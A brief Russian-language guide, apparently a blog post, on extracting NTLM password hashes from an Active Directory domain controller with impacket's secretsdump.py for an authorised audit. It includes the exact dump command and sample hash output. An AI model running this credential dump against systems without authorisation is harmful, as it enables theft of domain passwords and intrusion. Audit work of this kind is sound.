Если нам (исключительно в целях аудита и по согласованию с владельцем экземпляра AD) понадобилось вытащить хэши паролей пользователей, то в этом поможет пакет python-инструментов impacket, разработанный компанией SecureAuth.
Устанавливаем python, pip и impacket:
root@ubuntu:~# apt install python3 python3-pip
root@ubuntu:~# python3 -m pip install impacketИз всего набора скриптов нам понадобится только один — secretsdump.py. Положите его в удобное место на диске и запустите со следующими параметрами:
root@ubuntu:~# python3 secretsdump.py домен/логин@контроллер -just-dc-ntlm
root@ubuntu:~# python3 secretsdump.py koobik.local/administrator@10.20.30.40 -just-dc-ntlmОпция -just-dc-ntlm ограничит вывод до NTLM-хэшей. Пример вывода:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
koobik.local\i.ivanov:1011:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
koobik.local\p.petrov:1012:aad3b435b51404eeaad3b435b51404ee:d109d4b749aba95d12042dcdbd8add2d:::
koobik.local\s.sidorov:1013:aad3b435b51404eeaad3b435b51404ee:9bdc61db5a3fced6d82d49279f1f0430:::Обратите внимание — lm-хэши будут одинаковыми, т.к. не используются (пустой пароль). А по nt-хэшам можно проводить дальнейший аудит.
Полный набор опций secretsdump.py можно найти тут.